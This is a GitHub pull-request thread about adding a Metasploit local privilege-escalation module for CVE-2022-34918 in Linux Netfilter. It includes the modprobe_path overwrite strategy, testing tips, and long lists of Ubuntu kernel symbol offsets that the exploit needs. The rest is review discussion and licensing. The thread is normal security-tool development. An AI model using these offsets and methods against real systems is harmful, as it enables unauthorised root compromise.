metasploit-framework icon indicating copy to clipboard operation
metasploit-framework copied to clipboard

Published 20 hours ago verified publisher icon rapid7

Add exploit for CVE-2022-34918

Open red0xff opened this issue 2 years ago • 9 comments

CVE-2022-34918

This is a local-privilege escalation exploit targeting the Netfilter component of the Linux kernel.

CVE details RandoriSec blog post

The vulnerability was discovered, and the initial exploit code was written by Arthur Mongodin (@Aleknight) during his internship at RandoriSec, I made a few modifications to the PoC code, and made a metasploit module out of it.

The exploit targets Ubuntu, it aims to overwrite the modprobe_path variable with a string in /tmp/, to create a corresponding temporary file that gives the setuid bit to our payload.

From my testing, it has a pretty good success rate, but the system is not always in a stable state after successful exploitation (kernel panics can occur randomly at any time).

Credits

Thanks to @RandoriSec for supporting this research, and the publication of this exploit code.

Verification

List the steps needed to make sure this thing works

  • [ ] Start msfconsole
  • [ ] Run Ubuntu (Desktop or Server), running a kernel that has offsets in external/source/exploits/CVE-2022-34918/src/util.c, 5.15.0-25-generic #25-Ubuntu for example.
  • [ ] Get a session on the target
  • [ ] Test this module use exploit/linux/local/netfilter_nft_set_elem_init_privesc
  • [ ] Verify The privilege escalation works

Possible improvements

  • This exploit leaves a file in /tmp, having a non-printable name, the file is created by the exploit binary, not sure if it's a good idea to use register_file_for_cleanup for it.

  • Compiling on the target would be a good idea, but as I see, the Msf::Post::Linux::Compile mixin is mainly a wrapper over gcc. I think it would be a great idea to have a wrapper around make, support clang perhaps if there is no gcc on the target, and so on. I don't think wrapping the exploit in a single file would be a good idea.

  • The exploit writes a file to /tmp anyway, WritableDir is used for uploading the payload and the exploit, but the exploitation strategy used overwrites bytes from modprobe_path with a valid pointer that is also a filename in /tmp.

  • A check method? Not sure if check should return whether the vulnerability is present, or whether the target is supported (The vulnerability is not specific to Ubuntu, but the exploitation strategy might differ, and the exploit doesn't even have all the offsets for Ubuntu kernel versions).

  • More offsets for more Ubuntu kernel versions would be nice (update external/source/exploits/CVE-2022-34918/src/util.c). The needed offsets are those of:

    • io_ring_ctx_ref_free
    • io_rsrc_node_ref_zero
    • modprobe_path

Testing tips

  • To speed-up the exploit upload, you can remove the -static flag in the Makefile (this will reduce the file size drastically).
  • If it fails a few times, reboot and retry (it relies on heap spraying).
  • On successful exploitation, you get a root shell.

lpe_successful

red0xff avatar Jul 20 '22 11:07 red0xff

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

github-actions[bot] avatar Jul 20 '22 12:07 github-actions[bot]

A check method? Not sure if check should return whether the vulnerability is present, or whether the target is supported (The vulnerability is not specific to Ubuntu, but the exploitation strategy might differ, and the exploit doesn't even have all the offsets for Ubuntu kernel versions).

CheckCode::Appears is appropriate if the target system is determined to be vulnerable to be exploitable using the existing exploit code.

Use CheckCode::Safe with an appropriate message if the target system is likely to be vulnerable, but not exploitable using the existing exploit code; ie, something like: CheckCode::Safe("Target kernel version #{version} appears vulnerable, but no offsets for this version).

See also: https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-write-a-check-method.html

Edit: A quick read through the source shows that at minimum the target kernel must be Ubuntu and unprivileged user namespaces are required. Refer to the following modules which check for these requirements, in addition to checking the kernel version.

bcoles avatar Jul 20 '22 12:07 bcoles

Compiling on the target would be a good idea, but as I see, the Msf::Post::Linux::Compile mixin is mainly a wrapper over gcc. I think it would be a great idea to have a wrapper around make, support clang perhaps if there is no gcc on the target, and so on. I don't think wrapping the exploit in a single file would be a good idea.

You can write the upload and compile code manually. Before this method existed, the same code was copied between a bunch of modules. This method grew natively out of the copypasta. It isn't a rule.

Personally I usually prefer re-writing the exploit to be an all-in-one self-contained C file. This is more convenient and also means that the target host requires only gcc (no make). However, that is not always possible, and glancing at the 28 files in the PR it may not be viable here.

bcoles avatar Jul 20 '22 12:07 bcoles

More offsets for more Ubuntu kernel versions would be nice (update external/source/exploits/CVE-2022-34918/src/util.c).

This should keep you entertained for a while. Looks like io_rsrc_node_ref_zero was not present before 5.13 Ubuntu kernels.

20.04.4 LTS

/boot/System.map-5.11.0-41-generic:ffffffff8137db60 t io_ring_ctx_ref_free
/boot/System.map-5.11.0-44-generic:ffffffff8137de70 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-25-generic:ffffffff81389270 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-27-generic:ffffffff81389280 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-30-generic:ffffffff81389740 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-35-generic:ffffffff81389740 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-37-generic:ffffffff81389ef0 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-39-generic:ffffffff81389ef0 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-41-generic:ffffffff8138a9a0 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-52-generic:ffffffff8138abf0 t io_ring_ctx_ref_free
/boot/System.map-5.4.0-26-generic:ffffffff81340560 t io_ring_ctx_ref_free
/boot/System.map-5.8.0-40-generic:ffffffff81368370 t io_ring_ctx_ref_free
/boot/System.map-5.8.0-41-generic:ffffffff81368370 t io_ring_ctx_ref_free
/boot/System.map-5.8.0-43-generic:ffffffff81368370 t io_ring_ctx_ref_free
/boot/System.map-5.8.0-44-generic:ffffffff81352080 t io_ring_ctx_ref_free
/boot/System.map-5.8.0-45-generic:ffffffff81352400 t io_ring_ctx_ref_free
/boot/System.map-5.8.0-48-generic:ffffffff813523b0 t io_ring_ctx_ref_free
/boot/System.map-5.8.0-49-generic:ffffffff81353270 t io_ring_ctx_ref_free
/boot/System.map-5.8.0-50-generic:ffffffff81353270 t io_ring_ctx_ref_free
/boot/System.map-5.8.0-53-generic:ffffffff81353c20 t io_ring_ctx_ref_free

/boot/System.map-5.13.0-25-generic:ffffffff81389a80 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-27-generic:ffffffff81389a90 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-30-generic:ffffffff81389f50 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-35-generic:ffffffff81389f50 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-37-generic:ffffffff8138a700 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-39-generic:ffffffff8138a700 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-41-generic:ffffffff8138b1b0 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-52-generic:ffffffff8138b400 t io_rsrc_node_ref_zero

/boot/System.map-5.11.0-41-generic:ffffffff82c6c2e0 D modprobe_path
/boot/System.map-5.11.0-44-generic:ffffffff82c6c2e0 D modprobe_path
/boot/System.map-5.13.0-25-generic:ffffffff82e6e0a0 D modprobe_path
/boot/System.map-5.13.0-27-generic:ffffffff82e6e0a0 D modprobe_path
/boot/System.map-5.13.0-30-generic:ffffffff82e6e220 D modprobe_path
/boot/System.map-5.13.0-35-generic:ffffffff82e6e220 D modprobe_path
/boot/System.map-5.13.0-37-generic:ffffffff82e6e220 D modprobe_path
/boot/System.map-5.13.0-39-generic:ffffffff82e6e220 D modprobe_path
/boot/System.map-5.13.0-41-generic:ffffffff82e6e220 D modprobe_path
/boot/System.map-5.13.0-52-generic:ffffffff82e6e220 D modprobe_path
/boot/System.map-5.4.0-26-generic:ffffffff8265f640 D modprobe_path
/boot/System.map-5.8.0-40-generic:ffffffff82663b80 D modprobe_path
/boot/System.map-5.8.0-41-generic:ffffffff82663b80 D modprobe_path
/boot/System.map-5.8.0-43-generic:ffffffff82663b80 D modprobe_path
/boot/System.map-5.8.0-44-generic:ffffffff82663bc0 D modprobe_path
/boot/System.map-5.8.0-45-generic:ffffffff82663bc0 D modprobe_path
/boot/System.map-5.8.0-48-generic:ffffffff82663bc0 D modprobe_path
/boot/System.map-5.8.0-49-generic:ffffffff82663bc0 D modprobe_path
/boot/System.map-5.8.0-50-generic:ffffffff82663bc0 D modprobe_path
/boot/System.map-5.8.0-53-generic:ffffffff82663bc0 D modprobe_path

/boot/vmlinuz-5.11.0-41-generic:5.11.0-41-generic (buildd@lgw01-amd64-005) #45~20.04.1-Ubuntu SMP Wed Nov 10 10:20:10 UTC 2021Binary file /boot/vmlinuz-5.11.0-41-generic matches
/boot/vmlinuz-5.11.0-44-generic:5.11.0-44-generic (buildd@lcy02-amd64-042) #48~20.04.2-Ubuntu SMP Tue Dec 14 15:36:44 UTC 2021Binary file /boot/vmlinuz-5.11.0-44-generic matches
/boot/vmlinuz-5.13.0-25-generic:5.13.0-25-generic (buildd@lcy02-amd64-029) #26~20.04.1-Ubuntu SMP Fri Jan 7 16:27:40 UTC 2022Binary file /boot/vmlinuz-5.13.0-25-generic matches
/boot/vmlinuz-5.13.0-27-generic:5.13.0-27-generic (buildd@lgw01-amd64-045) #29~20.04.1-Ubuntu SMP Fri Jan 14 00:32:30 UTC 2022Binary file /boot/vmlinuz-5.13.0-27-generic matches
/boot/vmlinuz-5.13.0-30-generic:5.13.0-30-generic (buildd@lcy02-amd64-003) #33~20.04.1-Ubuntu SMP Mon Feb 7 14:25:10 UTC 2022Binary file /boot/vmlinuz-5.13.0-30-generic matches
/boot/vmlinuz-5.13.0-35-generic:5.13.0-35-generic (buildd@ubuntu) #40~20.04.1-Ubuntu SMP Mon Mar 7 09:18:32 UTC 2022Binary file /boot/vmlinuz-5.13.0-35-generic matches
/boot/vmlinuz-5.13.0-37-generic:5.13.0-37-generic (buildd@lcy02-amd64-111) #42~20.04.1-Ubuntu SMP Tue Mar 15 15:44:28 UTC 2022Binary file /boot/vmlinuz-5.13.0-37-generic matches
/boot/vmlinuz-5.13.0-39-generic:5.13.0-39-generic (buildd@lcy02-amd64-080) #44~20.04.1-Ubuntu SMP Thu Mar 24 16:43:35 UTC 2022Binary file /boot/vmlinuz-5.13.0-39-generic matches
/boot/vmlinuz-5.13.0-41-generic:5.13.0-41-generic (buildd@lcy02-amd64-017) #46~20.04.1-Ubuntu SMP Wed Apr 20 13:16:21 UTC 2022Binary file /boot/vmlinuz-5.13.0-41-generic matches
/boot/vmlinuz-5.13.0-52-generic:5.13.0-52-generic (buildd@lcy02-amd64-067) #59~20.04.1-Ubuntu SMP Thu Jun 16 21:21:28 UTC 2022Binary file /boot/vmlinuz-5.13.0-52-generic matches
/boot/vmlinuz-5.4.0-26-generic:5.4.0-26-generic (buildd@lcy01-amd64-029) #30-Ubuntu SMP Mon Apr 20 16:58:30 UTC 2020Binary file /boot/vmlinuz-5.4.0-26-generic matches
/boot/vmlinuz-5.8.0-40-generic:5.8.0-40-generic (buildd@lcy01-amd64-014) #45~20.04.1-Ubuntu SMP Fri Jan 15 11:35:04 UTC 2021Binary file /boot/vmlinuz-5.8.0-40-generic matches
/boot/vmlinuz-5.8.0-41-generic:5.8.0-41-generic (buildd@lgw01-amd64-003) #46~20.04.1-Ubuntu SMP Mon Jan 18 17:52:23 UTC 2021Binary file /boot/vmlinuz-5.8.0-41-generic matches
/boot/vmlinuz-5.8.0-43-generic:5.8.0-43-generic (buildd@lcy01-amd64-018) #49~20.04.1-Ubuntu SMP Fri Feb 5 09:57:56 UTC 2021Binary file /boot/vmlinuz-5.8.0-43-generic matches
/boot/vmlinuz-5.8.0-44-generic:5.8.0-44-generic (buildd@lgw01-amd64-054) #50~20.04.1-Ubuntu SMP Wed Feb 10 21:07:30 UTC 2021Binary file /boot/vmlinuz-5.8.0-44-generic matches
/boot/vmlinuz-5.8.0-45-generic:5.8.0-45-generic (buildd@lcy01-amd64-024) #51~20.04.1-Ubuntu SMP Tue Feb 23 13:46:31 UTC 2021Binary file /boot/vmlinuz-5.8.0-45-generic matches
/boot/vmlinuz-5.8.0-48-generic:5.8.0-48-generic (buildd@lgw01-amd64-008) #54~20.04.1-Ubuntu SMP Sat Mar 20 13:40:25 UTC 2021Binary file /boot/vmlinuz-5.8.0-48-generic matches
/boot/vmlinuz-5.8.0-49-generic:5.8.0-49-generic (buildd@lgw01-amd64-055) #55~20.04.1-Ubuntu SMP Fri Mar 26 01:01:07 UTC 2021Binary file /boot/vmlinuz-5.8.0-49-generic matches
/boot/vmlinuz-5.8.0-50-generic:5.8.0-50-generic (buildd@lgw01-amd64-030) #56~20.04.1-Ubuntu SMP Mon Apr 12 21:46:35 UTC 2021Binary file /boot/vmlinuz-5.8.0-50-generic matches
/boot/vmlinuz-5.8.0-53-generic:5.8.0-53-generic (buildd@lcy01-amd64-012) #60~20.04.1-Ubuntu SMP Thu May 6 09:52:46 UTC 2021Binary file /boot/vmlinuz-5.8.0-53-generic matches

Ubuntu 21.10

/boot/System.map-5.13.0-27-generic:ffffffff81390b70 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-30-generic:ffffffff81390d80 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-35-generic:ffffffff81390d80 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-37-generic:ffffffff81391440 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-37-lowlatency:ffffffff8139a660 t io_ring_ctx_ref_free
/boot/System.map-5.13.0-40-generic:ffffffff813919d0 t io_ring_ctx_ref_free

/boot/System.map-5.13.0-27-generic:ffffffff81391470 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-30-generic:ffffffff81391680 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-35-generic:ffffffff81391680 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-37-generic:ffffffff81391d40 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-37-lowlatency:ffffffff8139af10 t io_rsrc_node_ref_zero
/boot/System.map-5.13.0-40-generic:ffffffff813922d0 t io_rsrc_node_ref_zero

/boot/System.map-5.13.0-27-generic:ffffffff82e6e0a0 D modprobe_path
/boot/System.map-5.13.0-30-generic:ffffffff82e6e220 D modprobe_path
/boot/System.map-5.13.0-35-generic:ffffffff82e6e220 D modprobe_path
/boot/System.map-5.13.0-37-generic:ffffffff82e6e220 D modprobe_path
/boot/System.map-5.13.0-37-lowlatency:ffffffff82e6f1a0 D modprobe_path
/boot/System.map-5.13.0-40-generic:ffffffff82e6e220 D modprobe_path

/boot/vmlinuz-5.13.0-27-generic:5.13.0-27-generic (buildd@lcy02-amd64-014) #29-Ubuntu SMP Wed Jan 12 17:36:47 UTC 2022grep: /boot/vmlinuz-5.13.0-27-generic: binary file matches
/boot/vmlinuz-5.13.0-30-generic:5.13.0-30-generic (buildd@lcy02-amd64-032) #33-Ubuntu SMP Fri Feb 4 17:03:31 UTC 2022grep: /boot/vmlinuz-5.13.0-30-generic: binary file matches
/boot/vmlinuz-5.13.0-35-generic:5.13.0-35-generic (buildd@ubuntu) #40-Ubuntu SMP Mon Mar 7 08:03:10 UTC 2022grep: /boot/vmlinuz-5.13.0-35-generic: binary file matches
/boot/vmlinuz-5.13.0-37-generic:5.13.0-37-generic (buildd@lcy02-amd64-012) #42-Ubuntu SMP Tue Mar 15 14:34:06 UTC 2022grep: /boot/vmlinuz-5.13.0-37-generic: binary file matches
/boot/vmlinuz-5.13.0-37-lowlatency:5.13.0-37-lowlatency (buildd@lcy02-amd64-012) #42-Ubuntu SMP PREEMPT Tue Mar 15 15:24:39 UTC 2022grep: /boot/vmlinuz-5.13.0-37-lowlatency: binary file matches
/boot/vmlinuz-5.13.0-40-generic:5.13.0-40-generic (buildd@lcy02-amd64-069) #45-Ubuntu SMP Tue Mar 29 14:48:14 UTC 2022grep: /boot/vmlinuz-5.13.0-40-generic: binary file matches

bcoles avatar Jul 20 '22 13:07 bcoles

I added 14 more kernel offsets, and tested a few of these versions, thanks @bcoles . Could you provide a similar list for 22.04 LTS (if you have one of course). Or instructions on how you compile so many vmlinuz files.

The symbol that isn't present on older kernel versions is used in the KASLR bypass process, I am not sure if a different pointer could end up in the leaked memory, I might investigate it this weekend. Should still work with the io_ring_ctx_ref_free offset only, but I expect a lower success rate.

Added a check method also.

I will add the module docs tomorrow.

red0xff avatar Jul 20 '22 23:07 red0xff

Could you provide a similar list for 22.04 LTS (if you have one of course). Or instructions on how you compile so many vmlinuz files.

Ubuntu 22.04 LTS

/boot/System.map-5.15.0-24-lowlatency:ffffffff813e68a0 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-25-generic:ffffffff813dda20 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-27-generic:ffffffff813ddaf0 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-27-lowlatency:ffffffff813e6970 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-30-generic:ffffffff813dea40 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-30-lowlatency:ffffffff813e78b0 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-33-generic:ffffffff813dea40 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-33-lowlatency:ffffffff813e78c0 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-35-generic:ffffffff813dfa00 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-35-lowlatency:ffffffff813e88d0 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-37-generic:ffffffff813dfa00 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-37-lowlatency:ffffffff813e88d0 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-39-generic:ffffffff813dfa00 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-39-lowlatency:ffffffff813e88d0 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-40-generic:ffffffff813dfa00 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-40-lowlatency:ffffffff813e88d0 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-41-generic:ffffffff813e00a0 t io_ring_ctx_ref_free
/boot/System.map-5.15.0-41-lowlatency:ffffffff813e8f70 t io_ring_ctx_ref_free

/boot/System.map-5.15.0-24-lowlatency:ffffffff813e7690 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-24-lowlatency:ffffffff81cd8f9b t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-25-generic:ffffffff813de520 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-25-generic:ffffffff81cc586c t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-27-generic:ffffffff813de5f0 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-27-generic:ffffffff81cc58c8 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-27-lowlatency:ffffffff813e7760 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-27-lowlatency:ffffffff81cd8ff7 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-30-generic:ffffffff813df540 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-30-generic:ffffffff81cc6274 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-30-lowlatency:ffffffff813e86a0 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-30-lowlatency:ffffffff81cd99a3 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-33-generic:ffffffff813df540 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-33-generic:ffffffff81cc6274 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-33-lowlatency:ffffffff813e86b0 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-33-lowlatency:ffffffff81cd99a3 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-35-generic:ffffffff813e04f0 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-35-generic:ffffffff81cca3b2 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-35-lowlatency:ffffffff813e96b0 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-35-lowlatency:ffffffff81cdda6a t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-37-generic:ffffffff813e04f0 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-37-generic:ffffffff81cca3b2 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-37-lowlatency:ffffffff813e96b0 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-37-lowlatency:ffffffff81cdda6a t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-39-generic:ffffffff813e04f0 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-39-generic:ffffffff81cca3e1 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-39-lowlatency:ffffffff813e96b0 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-39-lowlatency:ffffffff81cdda99 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-40-generic:ffffffff813e04f0 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-40-generic:ffffffff81cca3e1 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-40-lowlatency:ffffffff813e96b0 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-40-lowlatency:ffffffff81cdda99 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-41-generic:ffffffff813e0b90 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-41-generic:ffffffff81ccb440 t io_rsrc_node_ref_zero.cold
/boot/System.map-5.15.0-41-lowlatency:ffffffff813e9d50 t io_rsrc_node_ref_zero
/boot/System.map-5.15.0-41-lowlatency:ffffffff81cdeaf8 t io_rsrc_node_ref_zero.cold

/boot/System.map-5.15.0-24-lowlatency:ffffffff82e8c320 D modprobe_path
/boot/System.map-5.15.0-25-generic:ffffffff82e8b3a0 D modprobe_path
/boot/System.map-5.15.0-27-generic:ffffffff82e8b320 D modprobe_path
/boot/System.map-5.15.0-27-lowlatency:ffffffff82e8c2a0 D modprobe_path
/boot/System.map-5.15.0-30-generic:ffffffff82e8b460 D modprobe_path
/boot/System.map-5.15.0-30-lowlatency:ffffffff82e8c3e0 D modprobe_path
/boot/System.map-5.15.0-33-generic:ffffffff82e8b460 D modprobe_path
/boot/System.map-5.15.0-33-lowlatency:ffffffff82e8c3e0 D modprobe_path
/boot/System.map-5.15.0-35-generic:ffffffff82e8b560 D modprobe_path
/boot/System.map-5.15.0-35-lowlatency:ffffffff82e8c4e0 D modprobe_path
/boot/System.map-5.15.0-37-generic:ffffffff82e8b560 D modprobe_path
/boot/System.map-5.15.0-37-lowlatency:ffffffff82e8c4e0 D modprobe_path
/boot/System.map-5.15.0-39-generic:ffffffff82e8b620 D modprobe_path
/boot/System.map-5.15.0-39-lowlatency:ffffffff82e8c5a0 D modprobe_path
/boot/System.map-5.15.0-40-generic:ffffffff82e8b620 D modprobe_path
/boot/System.map-5.15.0-40-lowlatency:ffffffff82e8c5a0 D modprobe_path
/boot/System.map-5.15.0-41-generic:ffffffff82e8b660 D modprobe_path
/boot/System.map-5.15.0-41-lowlatency:ffffffff82e8c5e0 D modprobe_path

/boot/vmlinuz-5.15.0-24-lowlatency:5.15.0-24-lowlatency (buildd@lcy02-amd64-007) #24-Ubuntu SMP PREEMPT Thu Mar 31 10:02:54 UTC 2022grep: /boot/vmlinuz-5.15.0-24-lowlatency: binary file matches
/boot/vmlinuz-5.15.0-25-generic:5.15.0-25-generic (buildd@ubuntu) #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022grep: /boot/vmlinuz-5.15.0-25-generic: binary file matches
/boot/vmlinuz-5.15.0-27-generic:5.15.0-27-generic (buildd@ubuntu) #28-Ubuntu SMP Thu Apr 14 04:55:28 UTC 2022grep: /boot/vmlinuz-5.15.0-27-generic: binary file matches
/boot/vmlinuz-5.15.0-27-lowlatency:5.15.0-27-lowlatency (buildd@lcy02-amd64-019) #28-Ubuntu SMP PREEMPT Tue Apr 19 15:27:08 UTC 2022grep: /boot/vmlinuz-5.15.0-27-lowlatency: binary file matches
/boot/vmlinuz-5.15.0-30-generic:5.15.0-30-generic (buildd@lgw01-amd64-058) #31-Ubuntu SMP Thu May 5 10:00:34 UTC 2022grep: /boot/vmlinuz-5.15.0-30-generic: binary file matches
/boot/vmlinuz-5.15.0-30-lowlatency:5.15.0-30-lowlatency (buildd@lgw01-amd64-030) #31-Ubuntu SMP PREEMPT Thu May 5 12:24:00 UTC 2022grep: /boot/vmlinuz-5.15.0-30-lowlatency: binary file matches
/boot/vmlinuz-5.15.0-33-generic:5.15.0-33-generic (buildd@lcy02-amd64-037) #34-Ubuntu SMP Wed May 18 13:34:26 UTC 2022grep: /boot/vmlinuz-5.15.0-33-generic: binary file matches
/boot/vmlinuz-5.15.0-33-lowlatency:5.15.0-33-lowlatency (buildd@lcy02-amd64-032) #34-Ubuntu SMP PREEMPT Wed May 18 15:38:29 UTC 2022grep: /boot/vmlinuz-5.15.0-33-lowlatency: binary file matches
/boot/vmlinuz-5.15.0-35-generic:5.15.0-35-generic (buildd@lcy02-amd64-029) #36-Ubuntu SMP Sat May 21 02:24:07 UTC 2022grep: /boot/vmlinuz-5.15.0-35-generic: binary file matches
/boot/vmlinuz-5.15.0-35-lowlatency:5.15.0-35-lowlatency (buildd@lcy02-amd64-055) #36-Ubuntu SMP PREEMPT Mon May 23 15:33:44 UTC 2022grep: /boot/vmlinuz-5.15.0-35-lowlatency: binary file matches
/boot/vmlinuz-5.15.0-37-generic:5.15.0-37-generic (buildd@lcy02-amd64-031) #39-Ubuntu SMP Wed Jun 1 19:16:45 UTC 2022grep: /boot/vmlinuz-5.15.0-37-generic: binary file matches
/boot/vmlinuz-5.15.0-37-lowlatency:5.15.0-37-lowlatency (buildd@lcy02-amd64-018) #39-Ubuntu SMP PREEMPT Thu Jun 2 17:44:08 UTC 2022grep: /boot/vmlinuz-5.15.0-37-lowlatency: binary file matches
/boot/vmlinuz-5.15.0-39-generic:5.15.0-39-generic (buildd@lcy02-amd64-069) #42-Ubuntu SMP Thu Jun 9 23:42:32 UTC 2022grep: /boot/vmlinuz-5.15.0-39-generic: binary file matches
/boot/vmlinuz-5.15.0-39-lowlatency:5.15.0-39-lowlatency (buildd@lcy02-amd64-108) #42-Ubuntu SMP PREEMPT Fri Jun 10 12:00:27 UTC 2022grep: /boot/vmlinuz-5.15.0-39-lowlatency: binary file matches
/boot/vmlinuz-5.15.0-40-generic:5.15.0-40-generic (buildd@lcy02-amd64-047) #43-Ubuntu SMP Wed Jun 15 12:54:21 UTC 2022grep: /boot/vmlinuz-5.15.0-40-generic: binary file matches
/boot/vmlinuz-5.15.0-40-lowlatency:5.15.0-40-lowlatency (buildd@lcy02-amd64-072) #43-Ubuntu SMP PREEMPT Thu Jun 16 17:07:13 UTC 2022grep: /boot/vmlinuz-5.15.0-40-lowlatency: binary file matches
/boot/vmlinuz-5.15.0-41-generic:5.15.0-41-generic (buildd@lcy02-amd64-065) #44-Ubuntu SMP Wed Jun 22 14:20:53 UTC 2022grep: /boot/vmlinuz-5.15.0-41-generic: binary file matches
/boot/vmlinuz-5.15.0-41-lowlatency:5.15.0-41-lowlatency (buildd@lcy02-amd64-032) #44-Ubuntu SMP PREEMPT Wed Jun 22 15:40:35 UTC 2022grep: /boot/vmlinuz-5.15.0-41-lowlatency: binary file matches

bcoles avatar Jul 21 '22 02:07 bcoles

I added some docs, updated the check method, and added offsets for Ubuntu 22.04 kernels, thanks to @bcoles . I also tested a few kernel versions, seems to work fine, but more testing is necessary.

red0xff avatar Jul 22 '22 01:07 red0xff

@bwatters-r7 Any updates on this?

(Should be ready for landing, please let me know if you need help at testing, or if you have more feedback)

red0xff avatar Aug 06 '22 07:08 red0xff

@red0xff some minor stuff, but yup, this is on my radar again.

bwatters-r7 avatar Aug 09 '22 21:08 bwatters-r7

Hey there @red0xff; thanks for addressing the changes! I'm in the middle of something else right now, but I'm hoping to take a look at this again next week.

bwatters-r7 avatar Aug 26 '22 15:08 bwatters-r7

Also, I'm assuming this is based in large part on https://github.com/randorisec/CVE-2022-34918-LPE-PoC, which is owned by @randorisec. I don't see a license file or license information in any of the files; do we have permission to use the code? Could we work with @randorisec to add a license file that would allow us to use it? I know that @Aleknight was the author, but if they did it while employed by @randorisec, my guess is that the code belongs to them, and the easiest thing would be to put a license file in the original repo that grants us (and/or anyone) permission to use it. Either a BSD-3 or MIT license would work, and I'm happy to work with the original repo owners to get it in place. I'll also tag @jmartin-r7 because while I know theoretically what needs to happen, he's actually done it.

bwatters-r7 avatar Aug 26 '22 20:08 bwatters-r7

Also, I'm assuming this is based in large part on https://github.com/randorisec/CVE-2022-34918-LPE-PoC, which is owned by @randorisec. I don't see a license file or license information in any of the files; do we have permission to use the code? Could we work with @randorisec to add a license file that would allow us to use it? I know that @Aleknight was the author, but if they did it while employed by @randorisec, my guess is that the code belongs to them, and the easiest thing would be to put a license file in the original repo that grants us (and/or anyone) permission to use it. Either a BSD-3 or MIT license would work, and I'm happy to work with the original repo owners to get it in place. I'll also tag @jmartin-r7 because while I know theoretically what needs to happen, he's actually done it.

You're right. Yes, you have the permission to use the code. I've added a BSD licence reference on the repo: https://github.com/randorisec/CVE-2022-34918-LPE-PoC#license

randorisec avatar Aug 28 '22 16:08 randorisec

Also, I'm assuming this is based in large part on https://github.com/randorisec/CVE-2022-34918-LPE-PoC, which is owned by @randorisec. I don't see a license file or license information in any of the files; do we have permission to use the code? Could we work with @randorisec to add a license file that would allow us to use it? I know that @Aleknight was the author, but if they did it while employed by @randorisec, my guess is that the code belongs to them, and the easiest thing would be to put a license file in the original repo that grants us (and/or anyone) permission to use it. Either a BSD-3 or MIT license would work, and I'm happy to work with the original repo owners to get it in place. I'll also tag @jmartin-r7 because while I know theoretically what needs to happen, he's actually done it.

You're right. Yes, you have the permission to use the code. I've added a BSD licence reference on the repo: https://github.com/randorisec/CVE-2022-34918-LPE-PoC#license

Hi there, Is that ok now (regarding the licence) ? Also can we help in anything else ?

randorisec avatar Sep 05 '22 12:09 randorisec

@randorisec the updates looks good we can move this PR forward based on that update.

I would recommend extracting and creating a LICENSE file so github will recognize it in your repository stats.

jmartin-tech avatar Sep 06 '22 13:09 jmartin-tech

@randorisec the updates looks good we can move this PR forward based on that update.

